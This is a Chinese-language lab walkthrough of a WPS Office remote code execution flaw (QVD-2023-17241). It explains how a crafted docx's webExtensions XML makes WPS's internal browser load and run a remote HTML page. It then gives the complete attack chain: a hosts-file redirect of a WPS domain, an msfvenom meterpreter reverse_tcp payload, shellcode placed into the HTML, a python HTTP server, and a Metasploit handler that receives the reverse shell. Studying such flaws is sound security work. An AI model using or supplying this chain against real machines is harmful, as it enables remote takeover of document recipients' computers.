WPS Office 代码执行漏洞(QVD-2023-17241)

目录

 

本地利用弹计算器（自娱自乐）

原理分析

msf的利用

1.修改win11中的hosts文件

2.MSF生成一个C#后门

3.shellcode替换

 4.在创建html的目录，用python打开http服务来捕获请求

5.开启监听

6.在win11中点击poc文档，可以看到kali中捕获的对1.html请求

7. 看到msf进入后渗透模块，攻击完成

---

 

本地利用弹计算器（自娱自乐）

修改本地hosts文件（在我的win11真实机失败了，在虚拟机中实验成功）

修改hosts文件

127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn

在1.html的目录中用python打开http，用看来捕获请求

python -m http.server 80

 然后直接在点开poc文档（放在顶部资源中）就可以弹计算器了。

 

原理分析

打开\word\webExtensions\webExtensions1.xml，可以看到

 

 可以看到XML标签中定义了访问的文件地址。docx文档中嵌入一个远程链接，当使用wps去打开文档时会去请求这个链接，由于WPS内部浏览器存在漏洞，会调用系统的api去执行攻击者在html中构造的恶意代码从而导致RCE。

 

msf的利用

1.修改win11中的hosts文件

192.168.1.4 clientweb.docer.wps.cn.cloudwps.cn

2.MSF生成一个C#后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 -f csharp > shellcode.c

3.shellcode替换

在kali中创建一个1.html文件，替换掉shellcode的变量（如果不成功的话，点击poc文档仍然弹出计算器的话，可以卸载掉wps重新进行安装。WPS中还存有删除shellcode变量之前的1.html文件的缓存，所以不需要请求网址中的1.html，依旧可以执行弹出计算器的命令）

1.html源码（修改完shellcode）

 4.在创建html的目录，用python打开http服务来捕获请求

python -m http.server 80

5.开启监听

msfconsolemsf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.1.4msf6 exploit(multi/handler) > set lport 4444msf6 exploit(multi/handler) > run

6.在win11中点击poc文档，可以看到kali中捕获的对1.html请求

7. 看到msf进入后渗透模块，攻击完成